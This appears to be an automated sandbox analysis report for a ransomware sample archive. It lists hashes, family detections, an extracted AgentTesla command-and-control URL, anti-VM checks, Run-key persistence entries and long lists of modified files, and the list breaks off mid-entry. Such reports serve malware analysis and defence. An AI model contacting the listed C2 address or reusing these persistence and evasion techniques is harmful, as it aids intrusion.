Analysis

max time kernel: 95s
max time network: 172s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 31-10-2024 21:05

Static task: static1
Behavioral task: behavioral1
Sample: RNSM00396.7z
Resource: win10v2004-20241007-en

General

Target: RNSM00396.7z
Size: 29.6MB
MD5: 852631ead84c70748b7ed10389174439
SHA1: f7442d849e8142853c651433bdc53953e541d49a
SHA256: 23ca1b521834978f16a892ba84be80cbd144fed4a066b844f4ecef108372a715
SHA512: ae5296c514d0e76fda7eaf176dc3bd9126aedde59faecc888ccd634dcc6c50c9a2664ee3c34d0f43e08be74ed8d2443615cdd7a038093003d058d02fe9c6fbda
SSDEEP: 786432:WKL81VrqfIp0ufCtSartVhZtlXYm4GpKh8aOL9a:Wq81V7facafhZ37xKh8zL4
Malware Config

Extracted (agenttesla): http://potentpharm.guru/siu/inc/4caa3e0bebb96f.php
Signatures

AgentTesla
  Agent Tesla is a remote access tool (RAT) written in Visual Basic.

Agenttesla family

Blackmoon family

Detect Blackmoon payload (1 IoC)
  Processes:
    resource: C:\Users\Admin\Desktop\00396\Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe
    yara_rule: family_blackmoon

Glupteba family

AgentTesla payload (1 IoC)
  Processes:
    resource: behavioral1/memory/4880-4382-0x0000000000430000-0x000000000046C000-memory.dmp
    yara_rule: family_agenttesla
Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs, 1 IoC)
  Processes:
    Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ (process: Trojan-Ransom.Win32.Blocker.mqdk-2d584363633271e192a32859582e72a6c7b084b32f582d8bc8fad3a240876cba.exe)
Renames multiple (58) files with added filename extension
  This suggests ransomware activity (encrypting all the files on the system).

Renames multiple (903) files with added filename extension
  This suggests ransomware activity (encrypting all the files on the system).
Modifies Windows Firewall (2 TTPs, 2 IoCs)
  Processes:
    pid 1616 netsh.exe
    pid 3040 netsh.exe
Checks BIOS information in registry (2 TTPs, 2 IoCs)
  BIOS information is often read in order to detect sandboxing environments.
  Processes:
    Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion (process: Trojan-Ransom.Win32.Blocker.mqdk-2d584363633271e192a32859582e72a6c7b084b32f582d8bc8fad3a240876cba.exe)
    Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion (process: Trojan-Ransom.Win32.Blocker.mqdk-2d584363633271e192a32859582e72a6c7b084b32f582d8bc8fad3a240876cba.exe)
Checks computer location settings (2 TTPs, 1 IoC)
  Looks up the country code configured in the registry, likely for geofencing.
  Processes:
    Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation (process: cmd.exe)
Executes dropped EXE (9 IoCs)
  Processes:
    pid 3388 HEUR-Trojan-Ransom.MSIL.Blocker.gen-59c68e677736307222342ef862ad4f6bc4f2e2648a9880f1cb40ebd9727e382f.exe
    pid 2664 HEUR-Trojan-Ransom.Win32.Cryptolocker.vho-1bd413e29fb8297ebc35a30ce346a8d544328ef51dfc4ff3553549558a40b3b5.exe
    pid 2668 HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe
    pid 4572 HEUR-Trojan-Ransom.Win32.Cryptolocker.vho-1bd413e29fb8297ebc35a30ce346a8d544328ef51dfc4ff3553549558a40b3b5.exe
    pid 1412 Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe
    pid 5160 Trojan-Ransom.Win32.Blocker.modo-f2da2e69c9aa24ac0aa0a79a3f01fa3db7e189d29130297cff8fb3e1a126d088.exe
    pid 5340 Trojan-Ransom.Win32.Blocker.modo-f2da2e69c9aa24ac0aa0a79a3f01fa3db7e189d29130297cff8fb3e1a126d088.exe
    pid 5444 Trojan-Ransom.Win32.Blocker.mqdk-2d584363633271e192a32859582e72a6c7b084b32f582d8bc8fad3a240876cba.exe
    pid 632 csrss.exe
Identifies Wine through registry keys (2 TTPs, 1 IoC)
  Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.
  Processes:
    Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine (process: Trojan-Ransom.Win32.Blocker.mqdk-2d584363633271e192a32859582e72a6c7b084b32f582d8bc8fad3a240876cba.exe)
Loads dropped DLL (19 IoCs)
  Processes:
    pid 3388 HEUR-Trojan-Ransom.MSIL.Blocker.gen-59c68e677736307222342ef862ad4f6bc4f2e2648a9880f1cb40ebd9727e382f.exe (listed once)
    pid 5340 Trojan-Ransom.Win32.Blocker.modo-f2da2e69c9aa24ac0aa0a79a3f01fa3db7e189d29130297cff8fb3e1a126d088.exe (listed 18 times)
Adds Run key to start application (2 TTPs, 2 IoCs)
  Processes:
    Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WildWater = "\"C:\\Windows\\rss\\csrss.exe\"" (process: HEUR-Trojan-Ransom.Win32.Cryptolocker.vho-1bd413e29fb8297ebc35a30ce346a8d544328ef51dfc4ff3553549558a40b3b5.exe)
    Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\iconrdb = "C:\\Users\\Admin\\AppData\\Roaming\\iconrdb.exe" (process: Trojan-Ransom.Win32.Blocker.modo-f2da2e69c9aa24ac0aa0a79a3f01fa3db7e189d29130297cff8fb3e1a126d088.exe)
Checks installed software on the system (1 TTP)
  Looks up Uninstall key entries in the registry to enumerate software on the system.
Drops desktop.ini file(s) (2 IoCs)
  Processes:
    File created C:\$Recycle.Bin\S-1-5-21-4089630652-1596403869-279772308-1000\desktop.ini (process: Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe)
    File created C:\Program Files\desktop.ini (process: Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe)
Modifies boot configuration data using bcdedit (1 IoC)
  Processes:
    pid 5140 bcdedit.exe
Drops autorun.inf file (1 TTP, 1 IoC)
  Malware can abuse Windows Autorun to spread further via attached volumes.
  Processes:
    File opened for modification C:\Windows\WinSxS\x86_microsoft-windows-s..ccessagent-binaries_31bf3856ad364e35_10.0.19041.1_none_3802d0d85b60df4c\autorun.inf (process: HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe)
Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
  Processes:
    Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\Notify.jpg" (process: HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe)
Suspicious use of NtSetInformationThreadHideFromDebugger (1 IoC)
  Processes:
    pid 5444 Trojan-Ransom.Win32.Blocker.mqdk-2d584363633271e192a32859582e72a6c7b084b32f582d8bc8fad3a240876cba.exe

(signature name not present on the page)
  Processes:
    resource: behavioral1/memory/1080-5577-0x0000000000400000-0x0000000000498000-memory.dmp
    yara_rule: upx
Checks for VirtualBox DLLs, possible anti-VM trick (1 TTP, 1 IoC)
  Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
  Processes:
    File opened (read-only) \??\VBoxMiniRdrDN (process: HEUR-Trojan-Ransom.Win32.Cryptolocker.vho-1bd413e29fb8297ebc35a30ce346a8d544328ef51dfc4ff3553549558a40b3b5.exe)
Drops file in Program Files directory (64 IoCs)
  Processes:
    All 64 entries below are by process Trojan-Ransom.Win32.Agent.abvm-b4ec9be8e93dd3f6f48db661592ad6a96ffde8827a7a30362eec06232d9b8da5.exe
    File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\api-ms-win-core-heap-l1-1-0.dll
    File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.IO.Compression.Brotli.dll
    File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\System.Diagnostics.StackTrace.dll
    File created C:\Program Files\Common Files\microsoft shared\ink\nb-NO\tipresx.dll.mui
    File created C:\Program Files\Common Files\microsoft shared\ink\sl-SI\tipresx.dll.mui
    File created C:\Program Files\Common Files\System\msadc\it-IT\msdaremr.dll.mui
    File created C:\Program Files\Common Files\System\Ole DB\sqloledb.dll
    File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\System.ComponentModel.TypeConverter.dll
    File created C:\Program Files\Common Files\System\ado\de-DE\msader15.dll.mui
    File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Windows.dll
    File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\System.ComponentModel.EventBasedAsync.dll
    File opened for modification C:\Program Files\EnableShow.reg
    File created C:\Program Files\Common Files\microsoft shared\ink\ipsfin.xml
    File created C:\Program Files\Common Files\microsoft shared\ink\en-GB\tipresx.dll.mui
    File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.ObjectModel.dll
    File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Security.SecureString.dll
    File created C:\Program Files\Common Files\microsoft shared\ink\en-US\TipTsf.dll.mui
    File created C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\ja-jp.xml
    File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Globalization.Extensions.dll
    File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\mscordbi.dll
    File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\msquic.dll
    File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Linq.Parallel.dll
    File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Resources.Reader.dll
    File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.kk-kz.dll
    File created C:\Program Files\Common Files\microsoft shared\MSInfo\es-ES\msinfo32.exe.mui
    File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Text.Json.dll
    File opened for modification C:\Program Files\UseShow.mpg
    File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\api-ms-win-crt-math-l1-1-0.dll
    File created C:\Program Files\Common Files\microsoft shared\ink\hwrdeush.dat
    File created C:\Program Files\Common Files\microsoft shared\ink\en-US\InkObj.dll.mui
    File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Xml.XmlSerializer.dll
    File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\System.Reflection.Extensions.dll
    File opened for modification C:\Program Files\7-Zip\Lang\id.txt
    File created C:\Program Files\Common Files\microsoft shared\ink\hwrenclm.dat
    File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Text.Encodings.Web.dll
    File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Xml.ReaderWriter.dll
    File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\Microsoft.Win32.Registry.dll
    File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\api-ms-win-core-xstate-l2-1-0.dll
    File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Linq.Queryable.dll
    File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Diagnostics.Tools.dll
    File created C:\Program Files\Common Files\System\msadc\msdaprsr.dll
    File opened for modification C:\Program Files\7-Zip\7zG.exe
    File created C:\Program Files\Common Files\microsoft shared\ink\hwrespsh.dat
    File opened for modification C:\Program Files\Common Files\microsoft shared\VSTO\10.0\VSTOLoader.dll
    File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\System.Net.Primitives.dll
    File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\System.Reflection.Primitives.dll
    File opened for modification C:\Program Files\7-Zip\Lang\ky.txt
    File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Net.WebHeaderCollection.dll
    File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Numerics.Vectors.dll
    File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Transactions.dll
    File created C:\Program Files\Common Files\microsoft shared\ink\InkDiv.dll
    File created C:\Program Files\Common Files\System\es-ES\wab32res.dll.mui
    File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\System.Resources.Reader.dll
    File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\System.Runtime.CompilerServices.VisualC.dll
    File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\System.Security.SecureString.dll
    File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.de-de.dll
    File created C:\Program Files\Common Files\System\ja-JP\wab32res.dll.mui
    File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Buffers.dll
    File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\Microsoft.CSharp.dll
    File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Diagnostics.TextWriterTraceListener.dll
    File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Numerics.Vectors.dll
    File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\System.Runtime.Serialization.Json.dll
    File created C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\base.xml
    File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\clrjit.dll
Drops file in Windows directory (64 IoCs; the list on the page breaks off after the 35th entry)
  Processes:
    All entries below are by process HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe
    File opened for modification C:\Windows\WinSxS\wow64_microsoft-windows-n..henabledapplication_31bf3856ad364e35_10.0.19041.1_none_2a06f47b6e35a4ff\Windows.Networking.Sockets.PushEnabledApplication.dll
    File opened for modification C:\Windows\WinSxS\wow64_microsoft-windows-i..nternetcontrolpanel_31bf3856ad364e35_11.0.19041.1266_none_520c37db64df4084\r\inetcpl.cpl
    File opened for modification C:\Windows\WinSxS\wow64_netfx4clientcorecomp.resources_31bf3856ad364e35_10.0.15805.0_ja-jp_afb5d1f043634aff\managePermissions.aspx.ja.resx
    File opened for modification C:\Windows\WinSxS\wow64_netfx4clientcorecomp.resources_31bf3856ad364e35_10.0.15805.0_it-it_0d9052e350483924\wizardInit.ascx.it.resx
    File opened for modification C:\Windows\WinSxS\wow64_microsoft-windows-ui-xaml-controls_31bf3856ad364e35_10.0.19041.1023_none_95090027c7abbbb9\Windows.UI.Xaml.Controls.dll
    File opened for modification C:\Windows\WinSxS\x86_microsoft-windows-n..xcorecomp.resources_31bf3856ad364e35_10.0.19041.1_es-es_5d20853379777666\wizardPermission.ascx.es.resx
    File opened for modification C:\Windows\WinSxS\x86_microsoft-windows-a..c-performance-layer_31bf3856ad364e35_10.0.19041.1_none_6a0983a8860f5584\dmscript.dll
    File opened for modification C:\Windows\WinSxS\wow64_netfx4clientcorecomp.resources_31bf3856ad364e35_10.0.15805.0_it-it_0d9052e350483924\Tracking_Logic.sql
    File opened for modification C:\Windows\WinSxS\wow64_microsoft.powershel..resources.resources_31bf3856ad364e35_10.0.19041.1_fr-fr_e494480974de1597\MSFT_GroupResource.schema.mfl
    File opened for modification C:\Windows\WinSxS\wow64_microsoft-windows-nat-powershell_31bf3856ad364e35_10.0.19041.1_none_8544c27699e18a0d\MSFT_NetNatStaticMapping.cdxml
    File opened for modification C:\Windows\WinSxS\x86_netfx-aspnet_webadmin_prov_res_b03f5f7f11d50a3a_10.0.19041.1_none_a2ba81c5abcec0d9\manageconsolidatedProviders.aspx.resx
    File opened for modification C:\Windows\WinSxS\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.19041.1_zh-cn_7294ce476ec912f1\comctl32.dll.mui
    File opened for modification C:\Windows\WinSxS\x86_microsoft-windows-smbserver-powershell_31bf3856ad364e35_10.0.19041.488_none_debd2e6a67bd337b\SmbServerNetworkInterface.cdxml
    File opened for modification C:\Windows\WinSxS\wow64_microsoft.powershell.pester_31bf3856ad364e35_10.0.19041.1_none_9478227a478f23d5\about_should.help.txt
    File opened for modification C:\Windows\WinSxS\wow64_microsoft-windows-powershell-exe_31bf3856ad364e35_10.0.19041.1_none_295bb689d5f0ebfa\powershell.exe.config
    File opened for modification C:\Windows\WinSxS\wow64_microsoft-windows-m..player-shellpreview_31bf3856ad364e35_10.0.19041.1266_none_3fb851095cc978d4\r\wmprph.exe
    File opened for modification C:\Windows\WinSxS\x86_netfx4-aspnet_webadmin_wizard_res_b03f5f7f11d50a3a_4.0.15805.0_none_22b85720c37c52fb\wizardAddUser.ascx.resx
    File opened for modification C:\Windows\WinSxS\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.19041.1_fi-fi_b1f4c56a7ce81cae\comctl32.dll.mui
    File opened for modification C:\Windows\WinSxS\x86_microsoft-windows-n..xcorecomp.resources_31bf3856ad364e35_10.0.19041.1_de-de_b46452568a7278fc\home2.aspx.de.resx
    File opened for modification C:\Windows\WinSxS\x86_netfx4-globalserifcf_b03f5f7f11d50a3a_4.0.15805.0_none_28372ac2cfd16706\GlobalSerif.CompositeFont
    File opened for modification C:\Windows\WinSxS\x86_microsoft-windows-n..xcorecomp.resources_31bf3856ad364e35_10.0.19041.1_de-de_b46452568a7278fc\navigationBar.ascx.de.resx
    File opened for modification C:\Windows\WinSxS\wow64_microsoft-windows-tcpip-wmiv2provider_31bf3856ad364e35_10.0.19041.1_none_dd43866469710c67\MSFT_NetTransportFilter.cdxml
    File opened for modification C:\Windows\WinSxS\wow64_microsoft.windows.powershell.v3.common_31bf3856ad364e35_10.0.19041.1_none_57d052f85763ab6b\developerManagedEnumeration.xsd
    File opened for modification C:\Windows\WinSxS\wow64_microsoft.packagema..agesource.resources_31bf3856ad364e35_10.0.19041.1_ja-jp_4755913689becd82\MSFT_PackageManagementSource.strings.psd1
    File opened for modification C:\Windows\WinSxS\wow64_microsoft.powershel..resources.resources_31bf3856ad364e35_10.0.19041.1_uk-ua_6c1aa43db0003bcf\MSFT_EnvironmentResource.schema.mfl
    File opened for modification C:\Windows\WinSxS\wow64_microsoft-windows-l..-lpksetup.resources_31bf3856ad364e35_10.0.19041.1_uk-ua_e6d709a245b459a8\lpeula.rtf
    File opened for modification C:\Windows\WinSxS\x86_microsoft-windows-n..xcorecomp.resources_31bf3856ad364e35_10.0.19041.1_es-es_5d20853379777666\manageUsers.aspx.es.resx
    File opened for modification C:\Windows\WinSxS\wow64_netfx4clientcorecomp.resources_31bf3856ad364e35_10.0.15805.0_de-de_d7f4b3c0973f3fda\WebAdminHelp_Application.aspx.de.resx
    File opened for modification C:\Windows\WinSxS\wow64_microsoft.windowsau..nprotocols.commands_31bf3856ad364e35_10.0.19041.84_none_a2b3c63b6e011244\Microsoft.WindowsAuthenticationProtocols.Commands.dll
    File opened for modification C:\Windows\WinSxS\wow64_microsoft-windows-s..nsentverifier-winrt_31bf3856ad364e35_10.0.19041.264_none_d3c1ab31b05d8c9c\f\Windows.Security.Credentials.UI.UserConsentVerifier.dll
    File opened for modification C:\Windows\WinSxS\wow64_microsoft-windows-o..nefiles-extend-apis_31bf3856ad364e35_10.0.19041.1_none_4d38750d0809fde7\cscobj.dll
    File opened for modification C:\Windows\WinSxS\wow64_microsoft-windows-n..tcapture-powershell_31bf3856ad364e35_10.0.19041.1_none_564dad239cbedf01\NetEventPacketCapture.Types.ps1xml
    File opened for modification C:\Windows\WinSxS\wow64_microsoft-windows-i..mon-printexperience_31bf3856ad364e35_10.0.19041.746_none_7f8ee0379cb19113\r\Windows.Internal.ShellCommon.PrintExperience.dll
    File opened for modification C:\Windows\WinSxS\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_5.82.19041.1_cs-cz_659b8edb96b66240\comctl32.dll.mui
    File opened for modification C:\Windows\WinSxS\x86_microsoft-windows-wwfcorecomp.resources_31bf3856ad364e35_10.0.19041.1_de-de_6c44f10919aaee05\Tracking_Schema.sql
    File opened for
modification C:\Windows\WinSxS\wow64_microsoft.powershell.dsc_31bf3856ad364e35_10.0.19041.1_none_a5de854f1c9a4cb0\Stop-DscConfiguration.cdxml HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_microsoft-windows-peerdist-common_31bf3856ad364e35_10.0.19041.1151_none_dd2428acc5b9d2f7\BranchCacheSecondaryRepublicationCacheFile.cdxml HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_microsoft-windows-netshell-mui.resources_31bf3856ad364e35_10.0.19041.1_es-es_0f0a8d580e605d1d\ncpa.cpl.mui HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\x86_microsoft-windows-l..se-oem-professional_31bf3856ad364e35_10.0.19041.1288_none_82da9179703def48\r\license.rtf HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_windows-system-diag..formtelemetryclient_31bf3856ad364e35_10.0.19041.746_none_0663d0a203cde52d\f\Windows.System.Diagnostics.Telemetry.PlatformTelemetryClient.dll HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\x86_regsvcs_b03f5f7f11d50a3a_4.0.15805.0_none_8ce1f3b4679d3a76\regsvcs.exe.config HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\x86_microsoft-windows-smbserver-powershell_31bf3856ad364e35_10.0.19041.488_none_debd2e6a67bd337b\SmbComponent.cdxml HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification 
C:\Windows\WinSxS\x86_microsoft-windows-n..xcorecomp.resources_31bf3856ad364e35_10.0.19041.1_es-es_5d20853379777666\manageProviders.aspx.es.resx HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_microsoft.dtc.power..l.scripts.resources_31bf3856ad364e35_10.0.19041.1_es-es_a09788c8ce4abc1b\TestDtc.psd1 HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_microsoft-windows-powercfg_31bf3856ad364e35_10.0.19041.1_none_1ded72a14aa7d349\powercfg.cpl HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_microsoft-windows-netadaptercim_31bf3856ad364e35_10.0.19041.1_none_396e016fc459e02d\MSFT_NetAdapterAdvancedProperty.Format.ps1xml HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_microsoft-windows-netadaptercim_31bf3856ad364e35_10.0.19041.1_none_396e016fc459e02d\MSFT_NetAdapterEncapsulatedPacketTaskOffload.Format.ps1xml HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_microsoft-windows-i..ctorybrowsebinaries_31bf3856ad364e35_10.0.19041.1_none_fb092007593bff0c\dirlist.dll HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\x86_netfx4-aspnet_webadmin_images_b03f5f7f11d50a3a_4.0.15805.0_none_7ab11546ceb3decd\topGradRepeat.jpg HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification 
C:\Windows\WinSxS\wow64_microsoft.powershell.dscresources_31bf3856ad364e35_10.0.19041.1_none_5ab46b9671589b69\MSFT_RegistryResource.schema.mof HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_microsoft.powershel..resources.resources_31bf3856ad364e35_10.0.19041.1_en-us_4211752681e50d90\MSFT_ScriptResource.schema.mfl HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_microsoft.dtc.powershell.scripts_31bf3856ad364e35_10.0.19041.1_none_c197fa97b94cfe01\MsDtc.Types.ps1xml HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_microsoft-windows-o..ct-picker.resources_31bf3856ad364e35_10.0.19041.1_fr-fr_c99b8c8b56859548\objsel.dll.mui HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_netfx4clientcorecomp.resources_31bf3856ad364e35_10.0.15805.0_it-it_0d9052e350483924\default.aspx.it.resx HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_microsoft.windows.powershell.v3.common_31bf3856ad364e35_10.0.19041.1_none_57d052f85763ab6b\Microsoft.PowerShell.Security.psd1 HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_microsoft.windows.powershell.common_31bf3856ad364e35_10.0.19041.1_none_f125082deef76556\Diagnostics.Format.ps1xml HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification 
C:\Windows\WinSxS\wow64_netfx4clientcorecomp.resources_31bf3856ad364e35_10.0.15805.0_fr-fr_23685c9c791653a6\EditAppSetting.aspx.fr.resx HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_microsoft-windows-w..for-management-core_31bf3856ad364e35_10.0.19041.1202_none_497a4c9b969ee5eb\winrm.cmd HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_microsoft-windows-i..henticationbinaries_31bf3856ad364e35_10.0.19041.1_none_600fe2a6ef35d8c5\authbas.dll HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\x86_netfx35linq-system...del.dataannotations_31bf3856ad364e35_10.0.19041.1_none_6c8b447ee015b181\System.ComponentModel.DataAnnotations.dll HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_windows-storage-compression-winrt_31bf3856ad364e35_10.0.19041.264_none_ca772936fdb08fc7\Windows.Storage.Compression.dll HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_netfx4clientcorecomp.resources_31bf3856ad364e35_10.0.15805.0_it-it_0d9052e350483924\DefineErrorPage.aspx.it.resx HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File opened for modification C:\Windows\WinSxS\wow64_netfx4clientcorecomp.resources_31bf3856ad364e35_10.0.15805.0_es-es_80b0e69d86443d44\DropSqlPersistenceProviderSchema.sql HEUR-Trojan-Ransom.Win32.Cryptor.gen-cc2e282cfeb20165dc945795e872b446315e24e66395739b71cfedcb1af70728.exe File 